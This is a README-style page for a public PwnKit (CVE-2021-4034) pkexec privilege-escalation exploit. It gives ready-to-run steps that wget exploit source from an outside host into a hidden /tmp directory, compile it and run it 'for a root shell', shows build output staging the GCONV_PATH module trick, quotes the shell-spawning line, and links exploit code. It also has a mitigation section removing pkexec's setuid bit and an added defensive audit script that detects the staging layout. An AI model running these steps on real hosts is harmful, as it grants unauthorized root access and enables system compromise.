/pkexec-CVE-2021-4034

CVE-2021-4034 1day


blasty-vs-pkexec.c

cc (1) - GNU project C and C++ compiler

wget https://haxx.in/files/blasty-vs-pkexec.c -P /tmp/.ICE-unix/ -O poc.c
cd /tmp/.ICE-unix/
cc poc.c -o pwn
./pwn
.
├── GCONV_PATH=.
│   └── lol
├── lol
│   └── gconv-modules
├── payload.c
├── payload.so
├── poc.c
└── pwn

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

The original advisory by the real authors is here

# tree CVE-2021-4034
CVE-2021-4034
├── cve-2021-4034.c
├── Makefile
├── pwnkit.c
└── README.md

0 directories, 4 files


# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.

# tree
.
├── cve-2021-4034
├── cve-2021-4034.c
├── gconv-modules
├── GCONV_PATH=.
│   └── pwnkit.so:.
├── Makefile
├── pwnkit.c
├── pwnkit.so
└── README.md

1 directory, 8 files

pkexec fix

ls -alt /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec

chmod 0755 /usr/bin/pkexec
#or
chmod u-s /usr/bin/pkexec

diff:

-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwxr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root

# set the SUID bit again:
chmod u+s /usr/bin/pkexec
ls -alt /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
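For the mitigation above, an added example (not code from this repository or from the linked PoCs): a POSIX shell audit that reports whether pkexec still carries the setuid bit and scans a directory for the staging layout shown in the tree output (a GCONV_PATH=... directory and a gconv-modules file outside glibc's own directory). The scan root argument, the excluded glibc path pattern and the sample tree are assumptions constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of this repository: defender-side checks for the
# state the "pkexec fix" section leaves the system in, and for the on-disk
# layout shown in the README's tree output. Paths and sample tree are
# constructed assumptions.

# True when the binary still carries the setuid bit, i.e. the chmod u-s /
# chmod 0755 mitigation has not been applied (or was reverted).
pkexec_is_setuid() {
    bin="${1:-/usr/bin/pkexec}"
    [ -u "$bin" ]
}

# Look under a scan root for the staging artifacts. Prints each finding and
# returns 0 if anything was found, 1 if the tree looks clean.
scan_gconv_artifacts() {
    root="$1"
    # directories named GCONV_PATH=... (the fake iconv module directory)
    dirs=$(find "$root" -type d -name 'GCONV_PATH=*' 2>/dev/null)
    # gconv-modules files anywhere except glibc's own gconv directory
    # (the excluded pattern is an assumption about the distro layout)
    mods=$(find "$root" -type f -name 'gconv-modules' \
               ! -path '*/lib*/gconv/*' 2>/dev/null)
    [ -n "$dirs" ] && printf 'GCONV_PATH directory:\n%s\n' "$dirs"
    [ -n "$mods" ] && printf 'gconv-modules outside glibc:\n%s\n' "$mods"
    [ -n "$dirs$mods" ]
}

# Constructed sample mirroring the README's "tree" output, built in a temp
# directory so the scan can be exercised without touching a real system.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/GCONV_PATH=."
    echo "module UTF-8// PWNKIT// pwnkit 1" > "$t/gconv-modules"
    printf '%s\n' "$t"
}

# Stand-alone run: report pkexec state, then scan the sample tree.
if pkexec_is_setuid; then echo "pkexec is setuid root (fix not applied)"; fi
sample=$(make_sample_tree)
scan_gconv_artifacts "$sample" || echo "no artifacts found"
rm -rf "$sample"
```

Run it as `sh audit.sh`; point scan_gconv_artifacts at world-writable locations such as /tmp to look for the layout on a real host.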

Default shells:

In pwnkit.c the spawned shell is set by: char * const args[] = { "/bin/zsh", "-pi", NULL };

$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh
/usr/bin/tmux
/usr/bin/screen
/usr/bin/pwsh
/opt/microsoft/powershell/7/pwsh

References:

Analysis: https://wx.zsxq.com/dweb2/index/topic_detail/218225555482851

Analysis: https://mp.weixin.qq.com/s/3rnkcRfX_BxzlVzp0stQRw

Detailed root cause: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-localprivilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

Exploit: https://haxx.in/files/blasty-vs-pkexec.c

Exploit: https://github.com/berdav/CVE-2021-4034

Security advisory: https://mp.weixin.qq.com/s/bM20T1b39J5MHS14sdLikg